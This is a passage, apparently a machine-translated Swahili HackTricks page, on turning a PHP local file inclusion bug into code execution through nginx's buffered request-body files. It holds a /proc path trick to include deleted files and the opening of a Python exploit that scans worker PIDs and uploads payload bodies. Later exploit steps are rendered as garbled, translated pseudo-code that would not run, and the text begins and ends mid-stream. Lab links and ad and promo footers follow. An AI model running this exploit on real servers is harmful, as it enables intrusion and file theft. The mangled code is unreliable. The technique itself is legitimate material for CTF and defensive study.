WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wame vamiwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... ``` Angalia: Hauwezi kuingiza moja kwa moja `/proc/34/fd/15` katika mfano huu kwa sababu kazi ya include ya PHP itatatua njia kuwa /var/lib/nginx/body/0000001368 (deleted) ambayo haipo kwenye mfumo wa faili. Kizuizi hiki kidogo kinaweza kuepukwa kwa njia fulani ya kuelekeza kama: /proc/self/fd/34/../../../34/fd/15 ambayo mwishowe itatekeleza maudhui ya faili iliyofutwa ya /var/lib/nginx/body/0000001368\ ## Exploit Kamili ```python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv[1]}:{sys.argv[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid_max' }) pid_max = int(r.text) print(f'[*] cpus: {cpus}; pid_max: {pid_max}') nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_workers.append(pid) if len(nginx_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('[+] starting uploader') while not done: requests.get(URL, data=' //'```
<h2>Kutuma Mzigo wa Payload</h2><p>Wakati wa Kufanya Hivyo: Wakati wote</p><p>Kutuma Mzigo wa Payload kwa Kutumia Michakato Mbalimbali</p><p>Matumizi ya CPU Zote kwa Kutuma Mzigo kama Mwili wa Ombi kwa Nginx</p><p>Kuzalisha Kiambishi cha Njia ya Kipekee</p><p>Mbinu hii inazalisha njia kutoka kwa idadi ya vijenzi vya njia vya ProcFS. Njia iliyozalishwa itaonekana kama /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root njia = "" idadi\_ya\_kiambishi = random.randint(0, 10) kwa \_ katika mbalimbali(idadi\_ya\_kiambishi): pid = random.choice(nginx\_pids) ikiwa random.randint(0, 1) == 0: njia += f"/proc/{pid}/cwd" vinginevyo: njia += f"/proc/{pid}/root" rudisha njia</p>
<p>Kusoma Faili</p><p>Ombi la Kusoma Faili kwa Nginx PID, FD, na PIDs za Nginx</p><p>Orodha ya PIDs ya Nginx</p><p>Scan Nginx FDs kati ya 10 - 45 kwa mzunguko. Kwa kuwa faili na soketi zinaendelea kufungwa - ni kawaida sana kwa FD ya mwili wa ombi kufunguliwa ndani ya safu hii</p>
<p>Kusoma Faili kwa Kutumia Michakato Mbalimbali</p><p>Ikiwa **jina** == "**kuu**": Chapisha('\[DEBUG] Kuunda kikao cha maombi') kikao\_cha\_maombi = kujenga\_kikao\_cha\_maombi() Chapisha('\[DEBUG] Kupata PIDs za Nginx') nginx\_pids = pata\_nginx\_pids(kikao\_cha\_maombi) Chapisha(f'\[DEBUG] PIDs za Nginx: {nginx\_pids}') Chapisha('\[DEBUG] Kuanza kutuma mzigo') kutuma\_mzigo\_wa\_payload(kikao\_cha\_maombi) Chapisha('\[DEBUG] Kuanza wasomaji wa FD') soma\_faili\_kwa\_kutumia\_michakato\_mbalimbali(kikao\_cha\_maombi, nginx\_pids)
## Labs
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
## References
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
You can check their website and try their engine for **free** at:
<div data-gb-custom-block data-tag="embed" data-url='https://whiteintel.io'></div>
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
